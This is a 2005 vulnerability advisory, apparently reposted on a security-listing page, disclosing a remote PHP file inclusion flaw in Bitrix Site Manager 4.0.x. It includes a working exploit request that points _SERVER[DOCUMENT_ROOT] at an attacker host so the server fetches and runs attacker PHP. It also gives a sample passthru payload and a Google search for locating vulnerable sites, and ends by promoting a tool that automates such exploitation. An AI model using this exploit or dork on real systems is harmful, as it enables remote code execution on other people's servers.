Related information

PHP, ASP, CGI web applications security vulnerabilities

[SA15736] amaroK Web Frontend Exposure of User Credentials

[SA15738] Contelligent Preview Privilege Escalation Vulnerability

[SA15735] XAMPP "lang.php" Script Insertion and Information Disclosure

[SA15705] ATutor Cross-Site Scripting Vulnerabilities

From:	D_BuG <d_bug_(at)_bk.ru>
Date:	16.06.2005
Subject:	Vulnerability: Bitrix Php inclusion

Vendor: Bitrix
Product: Bitrix Site Manager 4.0.x

Vulnerability: php including.
Consequence: custom php code execution on server
Risk: Critical

Description:
Due to unfiltered _SERVER[DOCUMENT_ROOT] variable in file “\bitrix\modules\main\start.php”,
hacker can upload php script from other server and execute custom php code on webserver
Send transaction to the server.

Script Example:
<?php
passthru('ls -la');
?>

Transaction should look like http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/
“attackhost” server should contain dbconn.php script in /bitrix/php_interface/ ,
that should be executet on the target server.

Google search: inurl: /bitrix/

Discoveried By D_BuG d_bug@bk.ru
NemesisSecurityTeam
http://nemesisoftware.com/

CheckZond free v. 1.0 http://nemesisoftware.com/products.htm
uses the vulnerabilities above for automatic vulnerabilities search (Google Hacking technique) and usage.

--
Best regards,
D_BuG                          mailto:d_bug@bk.ru